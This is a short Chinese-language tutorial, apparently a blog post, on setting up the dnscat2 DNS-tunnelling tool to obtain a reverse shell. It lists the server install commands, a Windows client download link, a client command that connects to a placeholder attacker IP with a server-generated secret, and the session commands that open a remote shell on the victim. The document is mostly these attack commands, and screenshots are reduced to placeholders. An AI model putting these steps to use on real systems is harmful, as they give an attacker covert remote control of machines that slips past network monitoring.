DnsCat技术特点


Dns隧道反弹shell

DnsCat服务器的安装


#git clone https://github.com/iagox86/dnscat2.git
#cd dnscat2
#cd server
#sudo gem install bundler
#bundle install
#sudo ruby./dnscat2.rb

使用DnsCat反弹shell-LMLPHP

DnsCat客户端的安装


下载地址:https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip

>dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID

使用DnsCat反弹shell-LMLPHP

执行


#windows
#session -i x
#shell
#windows -i y

使用DnsCat反弹shell-LMLPHP

DnsCat能执行的命令


使用DnsCat反弹shell-LMLPHP

05-11 13:49